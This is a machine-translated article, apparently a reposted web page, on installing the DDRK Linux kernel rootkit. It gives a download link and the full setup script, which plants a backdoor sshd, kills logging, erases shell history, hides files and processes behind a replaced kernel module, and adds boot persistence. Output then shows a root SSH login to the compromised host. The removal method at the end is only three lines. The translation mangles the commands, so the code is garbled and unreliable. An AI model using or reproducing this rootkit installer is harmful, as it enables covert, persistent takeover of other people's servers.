Linux rootkit-ddrk attacks get root permissions and clear methods

Last Update:2013-11-29 Source: Internet

Author: User

Tags egrep

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

DDRK is a kernel-level rootkit that combines the advantages of shv and adore-ng in Linux.

DDRK files:

Netstat # Replace netstat in the system, read the port from the ssh configuration file, and hide it

Rk. ko # kernel module to hide files and processes

Setup # rootkit Installation File

Tty # ava Tool

Bin. tgz

--- Ttymon

--- Sshd. tgz

---. Sh

--- Shdcf2 # sshd configuration file

--- Shhk

--- Shhk. pub

--- Shrs

--- Sshd # sshd main program

DDRK: http://www.sectop.com/soft/ddrk.tgz

Therefore, you only need to upload these files to the server and run them successfully to obtain the root permission of the server. Do whatever you want.

The setup content is as follows:

#! /Bin/bash

########## Define variables ##########

DEFPASS = 123456 // default password

DEFPORT = 43958 // default port

BASEDIR = 'pwd'

SSHDIR =/lib/libsh. so

HOMEDIR =/usr/lib/libsh

Unset HISTFILE; unset HISTSIZE; unset HISTORY; unset HISTSAVE; unset HISTFILESIZE

Export PATH = $ PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

########## Check is root ##########

If ["$ (whoami )"! = "Root"]; then

Echo "become root and try again"

Echo ""

Exit

########## Extract all tar ##########

Tar zxf bin. tgz

Cd bin

Tar zxf sshd. tgz

Rm-rf./sshd. tgz

Cd $ BASEDIR

Rm-rf bin. tgz

Cd $ BASEDIR

######### Kill syslogd ##########

Killall-9 syslogd>/dev/null 2> & 1

Sleep 2

########## Remove sh. conf ##########

If [-f/etc/sh. conf]; then

Rm-rf/etc/sh. conf // password file encrypted by md5sum

######### Initialize sshd configuration ##########

If test-n "$1"; then

Echo "Using Password: $1"

Cd $ BASEDIR/bin

Echo-n $1 | md5sum>/etc/sh. conf

Else

Echo "No Password Specified, using default-$ DEFPASS"

Echo-n $ DEFPASS | md5sum>/etc/sh. conf

Touch-acmr/bin/ls/etc/sh. conf

Chown-f root: root/etc/sh. conf

If test-n "$2"; then

Echo "Using ssh-port: $2"

Echo "Port $2" >>$ BASEDIR/bin/. sh/sshd_config

Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2

Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf

Else

Echo "No ssh-port Specified, using default-$ DEFPORT"

Echo "Port $ DEFPORT"> $ BASEDIR/bin/. sh/sshd_config

Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2

Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf

########### Creating dirs ##########

SSHDIR =/lib/libsh. so

HOMEDIR =/usr/lib/libsh

If [-d/lib/libsh. so]; then

Rm-rf/lib/libsh. so

If [-d/usr/lib/libsh]; then

Rm-rf/usr/lib/libsh /*

Mkdir $ SSHDIR

Touch-acmr/bin/ls $ SSHDIR

Mkdir $ HOMEDIR

Touch-acmr/bin/ls $ HOMEDIR

Cd $ BASEDIR/bin

Mv. sh/* $ SSHDIR/

Mv. sh/. bashrc $ HOMEDIR

If [-f/sbin/ttyload]; then

Chattr-AacdisSu/sbin/ttyload

Rm-rf/sbin/ttyload

If [-f/usr/sbin/ttyload]; then

Rm-rf/usr/sbin/ttyload

If [-f/sbin/ttymon]; then

Rm-rf/sbin/ttymon

Mv $ SSHDIR/sshd/sbin/ttyload

Chmod a + xr/sbin/ttyload

Chmod o-w/sbin/ttyload

Touch-acmr/bin/ls/sbin/ttyload

Kill-9 'pidof ttyload'>/dev/null 2> & 1

Mv $ BASEDIR/bin/ttymon/sbin/ttymon

Chmod a + xr/sbin/ttymon

Touch-acmr/bin/ls/sbin/ttymon

Kill-9 'pidof ttymon'>/dev/null 2> & 1

Cp/bin/bash $ SSHDIR

######### Modify inittab ##########

Cp/etc/inittab/etc/. inittab

Sed-e s @ ^ :2345 @ 0: 2345: once:/usr/sbin/ttyload & @/etc/inittab>/etc/. inittab

Touch-acmr/etc/inittab/etc/. inittab

Mv-f/etc/. inittab/etc/inittab

Echo "/sbin/ttyload-q>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "/sbin/ttymon>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "$ {HOMEDIR}/tty I 'pidof ttyload'>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "$ {HOMEDIR}/tty I 'pidof ttymon'>/dev/null 2> & 1">/usr/sbin/ttyload

Touch-acmr/bin/ls/usr/sbin/ttyload

Chmod 755/usr/sbin/ttyload

/Usr/sbin/ttyload>/dev/null 2> & 1

Touch-amcr/bin/ls/etc/inittab

########## Make sure inittab has modified ##########

If [! "'Grep ttyload/etc/inittab '"]; then

Echo "# WARNING-sshd wont be reloaded upon restart"

Echo "# inittab shuffling probly fucked-up! "

########## Load rk. ko ##########

Cd $ BASEDIR

Modprobe-r ehci-hcd

Mv-f rk. ko/lib/modules/'uname-R'/kernel/drivers/usb/host/ehci-hcd.ko

Modprobe ehci-hcd

Mv tty $ HOMEDIR

########## Replace netstat ##########

Touch-acmr/bin/netstat

Mv-f netstat/bin/netstat

######### Hide all files and process ##########

$ HOMEDIR/tty h/etc/sh. conf>/dev/null 2> & 1

$ HOMEDIR/tty h/lib/libsh. so>/dev/null 2> & 1

$ HOMEDIR/tty h/usr/lib/libsh>/dev/null 2> & 1

$ HOMEDIR/tty h/sbin/ttyload>/dev/null 2> & 1

$ HOMEDIR/tty h/usr/sbin/ttyload>/dev/null 2> & 1

$ HOMEDIR/tty h/sbin/ttymon>/dev/null 2> & 1

$ HOMEDIR/tty I 'pidof ttyload'>/dev/null 2> & 1

$ HOMEDIR/tty I 'pidof ttymon'>/dev/null 2> & 1

######### Load rk. ko on boot ##########

Cat>/etc/sysconfig/modules/ehci. modules <EOF

#! /Bin/sh

# Install usb modules support

Modprobe-r ehci-hcd

Modprobe ehci-hcd

EOF

Touch-amcr/bin/ls/etc/sysconfig/modules/ehci. modules

Chmod 755/etc/sysconfig/modules/ehci. modules

$ HOMEDIR/tty h/etc/sysconfig/modules/ehci. modules>/dev/null 2> & 1

########## Check iptables setting ##########

If [-f/sbin/iptables]; then

Echo "'/sbin/iptables-l input | head-5 '"

Else

Echo ""

Echo "# lucky for u no iptables found"

######### Start syslogd ##########

/Sbin/syslogd-m 0

#./Setup 123 3333 // set the password to 123 and the port number to 3333

Usingpassword: 123

Usingssh-port: 3333

Chain INPUT (policy ACCEPT)

Target prot opt source destination

View hidden effects:

View Processes

# Ps-ef | egrep-I "ttyload | ttymon"

Root 24761 17990 0 00:00:00 pts/2 egrep-I ttyload | ttymon

View port

# Netstat-ntplu

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

Tcp 0 0 127.0.0.1: 2208 0.0.0.0: * LISTEN 2117/hpiod

-Tcp 0 0 0.0.0.0: 3306 0.0.0.0: * LISTEN 2267/mysqld

Tcp 0 0 0.0.0.0: 43958 0.0.0.0: * LISTEN-

Tcp 0 0 127.0.0.1: 631 0.0.0.0: * LISTEN 2134/cupsd

Tcp 0 0 127.0.0.1: 25 0.0.0.0: * LISTEN 2295/sendmail: acce

Tcp 0 0 127.0.0.1: 2207 0.0.0.0: * LISTEN 2122/python

Udp 0 0 0.0.0.0: 32768 0.0.0.0: * 2417/avahi-daemon:

Udp 0 0 0.0.0.0: 68 0.0.0.0: * 19752/dhclient

Udp 0 0 0.0.0.0: 5353 0.0.0.0: * 2417/avahi-daemon:

Udp 0 0 0.0.0.0: 631 0.0.0.0: * 2134/cupsd

View the load Module

# Lsmod | grep-I ehci-hcd

View rootkit Related Files

# Ls-dl/lib/libsh. so/usr/lib/libsh/etc/sh. conf/sbin/ttyload/sbin/ttymon/bin/ttymon/usr/sbin/ttyload

Ls:/bin/ttymon: No such file or directory

-Rw-r -- 1 2618748389 4063569279 36 Nov 28 2006/etc/sh. conf

Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/lib/libsh. so

-Rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006/sbin/ttyload

-Rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006/sbin/ttymon

Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/usr/lib/libsh

-Rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006/usr/sbin/ttyload

View the/etc/inittab File

# Run gettys in standard runlevels

0: 2345: once:/usr/sbin/ttyload

1: 2345: respawn:/sbin/mingetty tty1

2: 2345: respawn:/sbin/mingetty tty2

3: 2345: respawn:/sbin/mingetty tty3

4: 2345: respawn:/sbin/mingetty tty4

5: 2345: respawn:/sbin/mingetty tty5

6: 2345: respawn:/sbin/mingetty tty6

Verification:

The Host IP address that has been cracked and successfully executed is 192.168.27.129.

Log on to 192.168.27.129 from another server. Set the password to 123 and the port number to 3333.

[Root @ localhost ~] # Ssh 192.168.27.129-p 3333

A root@192.168.27.129s password:

Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1

[Sh] w. e. l. c. o. m. e

[Sh] To The DoDos Rootkit

[Root @ DoDo:/root] #

[Root @ DoDo:/root] # env

TERM = xterm

SHELL =/bin/bash

SSH_CLIENT = 192.168.27.13038824 3333

SSH_TTY =/dev/pts/3

USER = root

LS_COLORS = no = 00: fi = 00: di = 01; 34: ln = 01; 36: pi = 40; 33: so = 01; 35: bd = 40; 33; 01: cd = 40; 33; 01: or = 01; 05; 37; 41:

Mi = 01; 05; 37; 41: ex = 01; 32 :*. cmd = 01; 32 :*. exe = 01; 32 :*. com = 01; 32 :*. btm = 01; 32 :*. bat = 01; 32 :*. sh = 01; 32 :*.

Csh = 01; 32 :*. tar = 01; 31 :*. tgz = 01; 31 :*. arj = 01; 31 :*. taz = 01; 31 :*. lzh = 01; 31 :*. zip = 01; 31 :*. z = 01; 31 :*. Z = 01; 31:

*. Gz = 01; 31 :*. bz2 = 01; 31 :*. bz = 01; 31 :*. tz = 01; 31 :*. rpm = 01; 31 :*. cpio = 01; 31 :*. jpg = 01; 35 :*. gif = 01; 35 :*. bmp

= 01; 35: *. xbm = 01; 35: *. xpm = 01; 35: *. png = 01; 35: *. tif = 01; 35:

MAIL =/var/spool/mail/root

PATH =/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin: /usr/lib/libs :.

PWD =/root

MACHINE = DoDo

PS1 = [33 [0; 36 m] [$ ID @ [33 [1; 37 m] $ MACHINE [33 [0 m] [33 [0; 36 m]: $ {PWD}] #[33 [0 m]

SHLVL = 1

HOME =/usr/lib/libsh

ID = root

LOGNAME = root

_ =/Bin/env

So far, you can fully control 192.168.27.129.

Go to 192.168.27.129 to view the logon User:

# W

13:40:55 up, 0 users, load average: 1.23, 0.93, 0.77

User tty from login @ IDLE JCPU PCPU WHAT

Only Local Users are allowed.

Clear method:

# Cd/usr/lib/libsh

# Modprobe-r ehci-hcd

#./Tty u/etc/sysconfig/modules/ehci. modules